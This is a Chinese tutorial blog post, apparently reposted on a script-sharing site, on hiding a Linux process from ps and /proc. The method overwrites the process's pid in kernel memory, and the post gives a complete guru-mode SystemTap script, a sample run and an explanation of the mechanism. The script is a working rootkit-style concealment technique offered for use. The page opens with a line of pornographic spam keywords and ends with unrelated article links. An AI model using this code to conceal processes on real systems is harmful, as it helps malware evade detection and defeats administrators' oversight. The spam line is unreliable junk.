欧美bbbwbbbw肥妇,免费乱码人妻系列日韩,一级黄片

一行代碼教你如何隱藏Linux進程

 更新時間:2020年08月21日 09:56:45   作者:dog250  
這篇文章主要介紹了一行代碼教你如何隱藏Linux進程,文中通過示例代碼介紹的非常詳細,對大家的學習或者工作具有一定的參考學習價值,需要的朋友們下面隨著小編來一起學習學習吧

總有朋友問隱藏Linux進程的方法,我說你想隱藏到什么程度,是大隱于內(nèi)核,還是小隱于用戶。

網(wǎng)上通篇論述的無外乎hook掉procfs或者類似的用戶態(tài)方案,也都難免長篇大論,我說,這些場面都太大了,太復雜了。對于希望馬上看到效果的而言,看到這么一堆復雜的東西,大概率望而卻步。

本文介紹一種將Linux進程小隱于用戶的非常規(guī)方法,僅僅一行代碼:

修改掉進程的pid即可。

注意是小隱,所以,不值得反制,逗一下高級會議工程師搞個惡作劇玩玩得了。
target->pid = 0x7fffffff;

完整的腳本如下:

#!/usr/bin/stap -g
# hide.stp

global pid;

function hide(who:long)
%{
 struct task_struct *target;

 target = pid_task(find_vpid(STAP_ARG_who), PIDTYPE_PID);
 target->pid = 0x7fffffff;
%}

probe begin
{
 pid = $1
 hide(pid);
 exit();
}

來來來,試一下:

[root@localhost system]# ./tohide &
[1] 403
[root@localhost system]# ./hide.stp
[root@localhost system]#

用下面的命令可以檢測所有可顯示進程的二進制文件:

for pid in $(ls /proc|awk '/^[0-9]+/{print $1}'); do 
 ls -l /proc/$pid/exe; 
done

procfs里沒了,ps當然就檢測不到了。

如果你覺得guru模式的stap怪怪的,那么你完全可以編寫自己獨立的Linux kernel module,采用修改完即退的方法:

target->pid = xxxx;
return -1;

是不是比各種hook法簡單多了,所謂的 動數(shù)據(jù)而不要動代碼!

簡單的說一下原理。

  • task被創(chuàng)建的時候,根據(jù)其pid注冊procfs目錄結(jié)構(gòu)。
  • 展示procfs目錄結(jié)構(gòu)的時候,遍歷task list以其pid作為key來查找procfs目錄結(jié)構(gòu)。
  • 0x7fffffff(或者任何其它合理的值)根本沒有注冊過,當然無法顯示。

不多說。

再次聲明,不要試圖對本文所描述的方法進行反制,因為這么簡單的東西根本不值得反制,哈哈,不是嗎?

可以參考我之前的Rootkit系列文章來繼續(xù)研究Linux進程大隱于內(nèi)核的方法。同時,每一種方法我都給出了反制措施。

到此這篇關于一行代碼教你如何隱藏Linux進程的文章就介紹到這了,更多相關Linux隱藏進程內(nèi)容請搜索腳本之家以前的文章或繼續(xù)瀏覽下面的相關文章希望大家以后多多支持腳本之家!

相關文章

  • Centos查看端口占用情況和開啟端口命令詳解

    Centos查看端口占用情況和開啟端口命令詳解

    本篇文章主要介紹了Centos查看端口占用情況和開啟端口命令詳解,具有一定的參考價值,有興趣的可以了解一下
    2017-01-01
  • Linux之操作文件的系統(tǒng)調(diào)用

    Linux之操作文件的系統(tǒng)調(diào)用

    大家好,本篇文章主要講的是Linux之操作文件的系統(tǒng)調(diào)用,感興趣的同學趕快來看一看吧,對你有幫助的話記得收藏一下,方便下次瀏覽
    2021-12-12
  • Linux查看系統(tǒng)配置常用命令詳解

    Linux查看系統(tǒng)配置常用命令詳解

    這篇文章主要為大家詳細介紹了Linux查看系統(tǒng)配置常用命令,具有一定的參考價值,感興趣的小伙伴們可以參考一下
    2017-12-12
  • 詳解linux下安裝python3環(huán)境

    詳解linux下安裝python3環(huán)境

    這篇文章主要介紹了詳解linux下安裝python環(huán)境,小編覺得挺不錯的,現(xiàn)在分享給大家,也給大家做個參考。一起跟隨小編過來看看吧
    2017-03-03
  • 在LINUX系統(tǒng)上使用rsync命令詳解

    在LINUX系統(tǒng)上使用rsync命令詳解

    rsync是一款多功能的文件同步工具,支持增量備份,減少數(shù)據(jù)傳輸時間和帶寬,它可以與不同的shell和協(xié)議配合使用,確保數(shù)據(jù)傳輸?shù)陌踩?提供了詳細的安裝和使用指南,適用于多種Linux發(fā)行版,使用戶能夠輕松掌握和應用,Rsync的命令選項豐富
    2024-10-10
  • linux增加iptables防火墻規(guī)則的示例

    linux增加iptables防火墻規(guī)則的示例

    這篇文章主要介紹了linux增加iptables防火墻規(guī)則的示例,大家在使用的時候要把規(guī)則后的中文注釋去掉
    2014-01-01
  • Linux 中清空或刪除大文件內(nèi)容的五種方法

    Linux 中清空或刪除大文件內(nèi)容的五種方法

    這篇文章主要介紹了Linux 中清空或刪除大文件內(nèi)容的五種方法的相關資料,需要的朋友可以參考下
    2016-12-12
  • Linux(ubuntu)下實現(xiàn)增加/刪除文件權(quán)限

    Linux(ubuntu)下實現(xiàn)增加/刪除文件權(quán)限

    下面小編就為大家分享一篇Linux(ubuntu)下實現(xiàn)增加/刪除文件權(quán)限,具有很好的參考價值,希望對大家有所幫助。一起跟隨小編過來看看吧
    2018-04-04
  • Linux系統(tǒng)?Centos7.4手動在線升級到Centos7.7

    Linux系統(tǒng)?Centos7.4手動在線升級到Centos7.7

    這篇文章主要介紹了Centos7.4手動升級到Centos7.7,需要的朋友可以參考下
    2022-01-01
  • linux如何修改用戶密碼

    linux如何修改用戶密碼

    Linux系統(tǒng)管理員經(jīng)常需要修改用戶密碼,確保系統(tǒng)安全,兩種常用方法是chpasswd和passwd命令,chpasswd允許批量修改密碼,但存在安全風險,因為密碼以明文出現(xiàn)在命令歷史中,建議操作后清除相關命令記錄,passwd命令更安全,可為任何用戶設置密碼
    2024-10-10

最新評論